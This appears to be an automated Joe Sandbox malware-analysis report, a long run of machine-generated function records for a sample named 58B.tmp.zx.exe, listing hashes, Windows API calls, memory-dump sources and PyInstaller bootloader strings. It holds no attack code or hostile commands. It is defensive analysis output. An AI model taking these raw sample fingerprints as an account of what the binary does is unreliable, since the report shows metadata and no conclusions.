                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                          • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                          • Instruction ID: 76613591210bd4b6f1c4b46190c643d03f4f1a5035b3fa540cd74f3745ee735a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4114832B18F058AEB41AF60E8442A933A4FB59758F040E31DA2D87BA5DF78D2998340
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                          • Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                          • Instruction ID: 98204669ad9fdefa0ca2d72b3f5829b29df203948c5beab1401836340599c210
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7411622A0C68646FBA6BB25D60537A66D0EFA0BA8F104235EE5D97ED5DF3CD443C700
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F3835E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF641F2BEC5), ref: 00007FF641F3837C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe
                                                                                                                                                                                                                          • API String ID: 3580290477-2949737328
                                                                                                                                                                                                                          • Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                          • Instruction ID: 00cee89e9188205b0c09c372a7abd0bbb4ff9d143a7c03cf147bfa893785b94c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B416C32A0CA5A85EB96FF25E4801BC27E4FB45790B955139EA4E83FD5DE3CE4838301
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: .$:
                                                                                                                                                                                                                          • API String ID: 2020911589-4202072812
                                                                                                                                                                                                                          • Opcode ID: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                                                                                                                                          • Instruction ID: 9a0a266e94677f041f47b7a6065f9902dff1bdebea9fe18153bf5699d0797a88
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1415D22F0DB5A98FB92BBB198501FC26E46F14358F540035DE4EA7EC9DF3894478312
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                          • Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                          • Instruction ID: 9e860f8f654d6aa1dd3b8555fdde8bb69d2b2d8c220c9f7d55a6f825ad27eb40
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C41C372A2CA8581DB61EF25E4443A9A7A0FB58794F404031EE4DC7B88EF3CD443C701
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                                                          • Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                          • Instruction ID: 10c14f154b33b72766d500d59fea21227e9352e208b416ee3cfc56f370116e80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E21A232B0C68981EBA2BB15D44427D63E1FB94B84F454035DA8D83AC6DF7CE947C742
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                          • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                          • Instruction ID: c20293c4480933c1ad24b6f1ddc4560ad2bdfb9081ffcf7f96051365ce77a022
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2114C3662CB8482EB62AB25F54026977E4FB88B84F184230DF8D477A5DF3DC5528700
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000014.00000002.2284270534.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284234807.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284310577.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284344621.00007FF641F64000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000014.00000002.2284401010.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                                                                                                          • Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                          • Instruction ID: 6e545216d9e43f6d917ae23b03cf49d2cafd9a2c25b87cd50e4af7c5f5d1d31a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF014F21A2C64A86FBA6BF6094612BE67E0EF58708F840035D54DC7AD2DE7CE507CA16

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                                                          • API String ID: 514040917-585287483
                                                                                                                                                                                                                          • Opcode ID: 37299662909fd31b2dc1f19fb24c035a8bf2236558cf05c8c849e60866d03cca
                                                                                                                                                                                                                          • Instruction ID: ce4b8f7df4f6f8621b1c120936bdac7f041be9b197732ae72ec19b3cc8f6e948
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37299662909fd31b2dc1f19fb24c035a8bf2236558cf05c8c849e60866d03cca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99F19F61B0C6C291FB9AFB21D6552F963E1AF98780F844032DA1DC36D6EF2DE55AC301

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F44F55
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448BC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF641F39BEF,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F39C19
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF641F39BEF,?,?,?,?,?,00007FF641F39ADA), ref: 00007FF641F39C3E
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F44F44
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F44908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F4491C
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451BA
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451CB
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451DC
                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF641F4541C), ref: 00007FF641F45203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                          • API String ID: 4070488512-239921721
                                                                                                                                                                                                                          • Opcode ID: 13622b7b70a5489cd1e9d9666b20461ce2c076e8d4e1099f21d8c04fe7bf9fca
                                                                                                                                                                                                                          • Instruction ID: 570ae5e0368421c130c17b1d4fac710b277ddf00b0f25bcdca49e0b69b77a866
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13622b7b70a5489cd1e9d9666b20461ce2c076e8d4e1099f21d8c04fe7bf9fca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BD1AF26A0C64286EBA2FF26D6411B967E1FFA4794F444035EA0DC7AE6DE3CE443C740

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                          • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                          • Instruction ID: 69ea1258de8fc715cee994865935ac02d31da5275dc69634fb2ef91effb7241e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0C1C132B2CA4586EB51FFA8C5902AC37A1FB59B98B015225DF1E977E5DF38E452C300

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451BA
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F44908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F4491C
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451CB
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448BC
                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF641F451DC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F448D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF641F448EC
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: RtlFreeHeap.NTDLL(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C6E
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F39C58: GetLastError.KERNEL32(?,?,?,00007FF641F42032,?,?,?,00007FF641F4206F,?,?,00000000,00007FF641F42535,?,?,?,00007FF641F42467), ref: 00007FF641F39C78
                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF641F4541C), ref: 00007FF641F45203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                          • API String ID: 3458911817-239921721
                                                                                                                                                                                                                          • Opcode ID: a6c212af5f4fde8bec092a8ad4ab86d219424c673f68ca1923c57f3e2ab8ca08
                                                                                                                                                                                                                          • Instruction ID: 8c87b41562eb635765a79be36bba81775fb47de72bd49f09d5dc3db6a7a024d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6c212af5f4fde8bec092a8ad4ab86d219424c673f68ca1923c57f3e2ab8ca08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97517F32A0C64686E7A1FF21E9811A963E1BB68784F405136EA4DD7AE6DF3CF443C740
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                                                                                          • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                          • Instruction ID: 8084565eab56df56823934c87426674299e02a15cbe342ca9b576c64752de490
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F0C872A1C68186F7F1BF60B4483A673D0BB84328F440335D96D436D4CF3CD45A8A04

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _fread_nolock$Message
                                                                                                                                                                                                                          • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                          • API String ID: 677216364-3497178890
                                                                                                                                                                                                                          • Opcode ID: bf80d0b8a0de8a6362d56fa7f65a28689fb937646ba708a53e42927df424661c
                                                                                                                                                                                                                          • Instruction ID: 3b6ab993f6dffb2c468912170d2ec60f7662f00a4ea3d6d648ff767d9f0be917
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf80d0b8a0de8a6362d56fa7f65a28689fb937646ba708a53e42927df424661c
